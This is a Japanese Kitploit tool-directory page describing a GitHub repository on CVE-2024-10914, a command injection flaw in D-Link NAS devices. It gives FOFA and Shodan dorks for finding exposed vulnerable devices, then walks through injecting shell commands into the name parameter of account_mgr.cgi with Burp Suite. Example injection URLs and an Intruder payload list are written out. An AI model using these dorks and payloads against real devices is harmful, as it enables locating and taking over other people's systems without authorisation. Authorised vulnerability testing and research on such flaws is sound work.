Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10914 — CVE-2024-10914_burpsuiteを使用した手動テスト | Kitploit
ツール/GitHubGitHub/egi08/cve-2024-10914
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストコマンド&コントロール
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_burpsuiteを使用した手動テスト

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10914 D-Link NAS のコマンドインジェクション脆弱性テスト_Burp Suite を使った手動テスト


脆弱なデバイスを見つけるための Dork

以下の検索 dork を使用して、潜在的に脆弱な D-Link NAS デバイスを見つけます:

root@kitploit:~
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

この検索文字列は、脆弱性の影響を受ける特定のバージョンの Lighttpd サーバーを実行している脆弱な D-Link DNS ShareCenter アプリを識別するのに役立ちます。


このガイドでは、Burp Suite を使用して D-Link NAS の name パラメータにあるコマンドインジェクション脆弱性 (CVE-2024-10914) を手動でテストする方法を段階的に説明します。ターゲット URL: http://Target。

前提条件

  • Burp Suite
  • Burp Suite をプロキシとして使用するように設定された Web ブラウザ (通常は 127.0.0.1:8080 に設定)

ステップ 1: Burp Suite をセットアップする

  1. Burp Suite を起動する: お使いのマシンで Burp Suite を起動します。
  2. プロキシを設定する: ブラウザのプロキシ設定をポート 8080 の 127.0.0.1 に設定して、Burp Suite をプロキシとして使用するようにブラウザを設定します。

ステップ 2: リクエストをインターセプトする

  1. ターゲットに移動する: ブラウザで http://Target にアクセスします。
  2. インターセプトを有効にする: Burp Suite でインターセプト機能を有効にして、送信リクエストをキャプチャします。

ステップ 3: リクエストを変更する

  1. 脆弱なパラメータを見つける: インターセプトされたリクエスト内の URL から name パラメータを見つけます。次のように表示されます:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. テストコマンドを注入する: name パラメータに echo "test" などのテストコマンドを含むように変更します:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. 変更したリクエストを送信する: 変更したリクエストをサーバーに転送します。


ステップ 4: レスポンスを分析する

  1. レスポンスを確認する: レスポンス内で注入したコマンドの出力を探します。たとえば、サーバーが echo "test" を実行した場合、次のように表示されるはずです:

    root@kitploit:~
    test
    

ステップ 5: 脆弱性を悪用する

  1. 悪意のあるコマンドを注入する: テストが成功したら、次に示すようなより高度なコマンドを試します:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. 悪用リクエストを送信する: このリクエストをサーバーに転送します。

  3. レスポンスを分析する: コマンドの出力 (例: ユーザー ID 情報) がレスポンスに含まれているか確認します。


ステップ 6: Burp Suite 拡張機能で自動化する (任意)

  1. Intruder を使用する: Burp Suite の Intruder ツールを使用してテストを自動化します。

    • リクエストを右クリックし、Send to Intruder を選択します。
    • name パラメータをペイロード位置として設定します。
    • テスト用のペイロードとしてコマンドのリストを使用します。
  2. ペイロードの例:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. Intruder を開始する: Intruder 攻撃を実行して、複数のペイロードを自動的にテストします。


ツールをダウンロード